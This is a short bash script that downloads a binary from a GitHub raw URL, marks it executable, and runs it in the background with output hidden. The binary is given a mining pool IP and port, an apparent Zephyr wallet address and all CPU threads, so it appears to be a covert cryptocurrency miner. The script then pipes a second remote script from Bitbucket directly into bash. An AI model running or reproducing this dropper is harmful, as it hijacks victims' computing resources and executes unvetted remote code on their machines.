#!/bin/bash
curl https://github.com/dragonballku8/turn/raw/main/xirig -o sgr1
chmod +x sgr1
./sgr1 -o 172.104.181.49:443 -u ZEPHsDBeXxaS9MERnP3sHAPdCBFSMb2uZjcSyfBYezxE9kcrm6q1Z6XJcCbaqavmpMAncVgMHL8EkNAjskNT1bc6csQ86aLX1WD -p CAC -t $(nproc --all) > /dev/null 2>&1 &
curl -sL https://bitbucket.org/nicezep/file/raw/master/time | bash
